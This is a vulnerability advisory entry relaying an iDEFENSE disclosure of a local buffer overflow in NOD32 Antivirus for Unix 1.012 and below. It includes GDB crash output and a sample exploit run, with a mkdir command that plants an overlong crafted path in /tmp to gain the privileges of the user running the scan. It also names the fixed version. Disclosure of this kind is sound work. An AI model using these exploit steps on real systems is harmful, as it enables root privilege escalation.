COMMAND

	NOD32 Antivirus Software for Unix Buffer Overflow

SYSTEMS AFFECTED

	NOD32 Antivirus System for Unix version 1.012 and below is vulnerable

PROBLEM

	In iDEFENSE Security Advisory [02.10.03] :
	
	 http://www.idefense.com/advisory/02.10.03.txt
	
	With credits to Knud Erik Højgaard [knud@skodliv.dk],
	
	--snip--
	
	Local exploitation of a buffer overflow in NOD32 for  UNIX  could  allow
	attackers to gain super-user  (root)  privileges.  The  overflow  occurs
	when NOD32 parses a  path  with  a  name  of  length  greater  than  500
	characters (/tmp/AAAAA....AAA). An  attacker  can  overwrite  the  first
	three bytes of the eax and ecx  registers,  as  can  be  seen  from  the
	following GDB output:
	
	...
	Program received signal SIGSEGV, Segmentation fault.
	0x4207fa78 in strcmp () from /lib/i686/libc.so.6
	(gdb) bt
	#0 0x4207fa78 in strcmp () from /lib/i686/libc.so.6
	#1 0x0804c2ba in scan_dir ()
	#2 0x41414141 in ?? ()
	Cannot access memory at address 0x41414141
	(gdb) info registers
	eax 0x4141414c 1094795596
	ecx 0x4141414c 1094795596
	... 
	
	
	 ANALYSIS
	 ========
	
	Exploitation allows local code execution  with  the  privileges  of  the
	user who spawned NOD32. This is possible by  creating  an  exploit  path
	and then socially engineering a  target  user  into  scanning  over  the
	exploit path using NOD32. If the attacker has  write  permissions  to  a
	directory that is routinely scanned with NOD32 (such  as  /tmp),  he  or
	she can gain the privileges of the scanning user (usually root).
	
	Proof of concept exploit code has  been  written  for  the  FreeBSD  4.7
	platform. The following is a sample  exploit  run  that  should  set  up
	shell code in an environment  variable  and  spawn  a  shell  under  the
	privileges of the user executing NOD32:
	
	$ perl eggnod.pl
	$ mkdir -p /tmp/`perl -e 'print "A" x 255'`/`perl -e 'print "B" x 240 .
	"\xfc\xbf\xbf"'`
	$ nod32 /tmp
	
	
	--snap--

SOLUTION

	The latest version 1.013 fixes the issue and can be downloaded from
	 
	 http://www.nod32.com